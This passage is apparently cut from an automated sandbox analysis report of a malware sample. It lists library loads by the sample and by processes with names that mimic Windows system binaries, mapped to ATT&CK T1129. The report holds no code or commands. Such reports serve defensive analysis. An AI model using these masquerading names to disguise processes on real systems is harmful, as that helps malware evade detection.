loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"SMSS.EXE\" loaded module \"KERNEL32\" at base 76e70000\n \"SMSS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"SMSS.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6bb20000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 747b0000\n \"SMSS.EXE\" loaded module \"OLEAUT32.DLL\" at base 76830000\n \"SMSS.EXE\" loaded module \"SXS.DLL\" at base 759d0000\n \"SMSS.EXE\" loaded module \"CRYPTSP.DLL\" at base 754d0000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 75260000\n \"SMSS.EXE\" loaded module \"ADVAPI32.DLL\" at base 76630000\n \"SMSS.EXE\" loaded module \"CRYPTBASE.DLL\" at base 759c0000\n \"SMSS.EXE\" loaded module \"DWMAPI.DLL\" at base 74320000\n \"SMSS.EXE\" loaded module \"KERNEL32.DLL\" at base 76e70000\n \"SMSS.EXE\" loaded module \"SHELL32.DLL\" at base 76f70000\n \"SMSS.EXE\" loaded module \"OLE32.DLL\" at base 768d0000\n \"SMSS.EXE\" loaded module \"COMCTL32.DLL\" at base 74990000\n \"SMSS.EXE\" loaded module \"CLBCATQ.DLL\" at base 764a0000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74610000\n \"SMSS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76e70000\n \"SMSS.EXE\" loaded module \"SETUPAPI.DLL\" at base 75e00000\n \"SMSS.EXE\" loaded module \"RPCRT4.DLL\" at base 76d40000\n \"SMSS.EXE\" loaded module \"NTMARTA.DLL\" at base 74f40000\n \"SMSS.EXE\" loaded module \"USER32\" at base 76340000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75970000\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71230000\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00005816)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005972)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005972)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005972)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005972)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005972)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005972)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005972)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00005972)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00005972)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005972)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005972)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005972)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005972)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005972)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005972)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00005972)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005972)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00006136)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00006136)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00006136)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006136)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00006136)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00006136)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006136)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00006136)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00006136)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00006136)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00006136)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00006136)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00006136)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00006136)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003264)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003264)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003264)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003264)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003264)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003264)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003264)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003264)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003264)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003264)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005852)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005852)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005852)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005852)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005852)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005852)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005852)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005852)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005852)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005852)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005852)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004272)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004272)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004272)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004272)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004272)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004272)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004272)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00004272)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00004272)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00004272)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00004272)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00004272)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00004272)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00004272)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00004272)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00004272)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006072)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006072)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006072)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006072)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00006072)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00006072)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006072)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00006072)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004132)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004132)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004132)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004132)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004132)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004132)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004132)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004132)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004132)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004132)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004132)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00004132)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00004132)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00004132)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00004132)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00004132)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00004132)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00004132)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00004132)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00004132)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003964)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003964)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003964)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003964)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003964)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003964)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003964)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003964)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003964)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003964)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004124)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004124)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004124)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004124)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004124)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004124)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004340)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004340)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004340)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004340)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004340)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004340)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004340)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004340)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004340)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004340)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003836)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003836)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003836)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003836)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003836)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003836)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003836)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003836)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003836)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00003836)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00003836)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00003836)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00003836)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00003836)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00003836)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00003836)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00003836)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00003836)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00003836)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002164)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002164)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002164)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002164)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002164)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00002164)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00002164)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002164)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002164)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00002164)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00002164)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002428)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00002428)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00002428)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002428)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002428)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00002428)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00002428)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002428)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002428)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002428)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002428)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003016)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003016)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003628)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003628)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003628)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003628)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003628)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003628)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003628)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003628)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003628)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004068)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004068)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003096)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003096)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003096)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003096)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003096)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00003096)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00003096)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00003096)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00003096)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00003096)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00003096)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00003096)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00003096)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00003096)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00003096)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003096)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004088)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004088)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004088)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004088)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003756)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003756)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003756)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003756)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003756)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003756)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003756)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003756)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003756)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003756)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004308)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004308)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004308)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004308)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004308)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004308)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004308)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004308)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004308)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004308)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004308)\n \"SMSS.EXE\" called 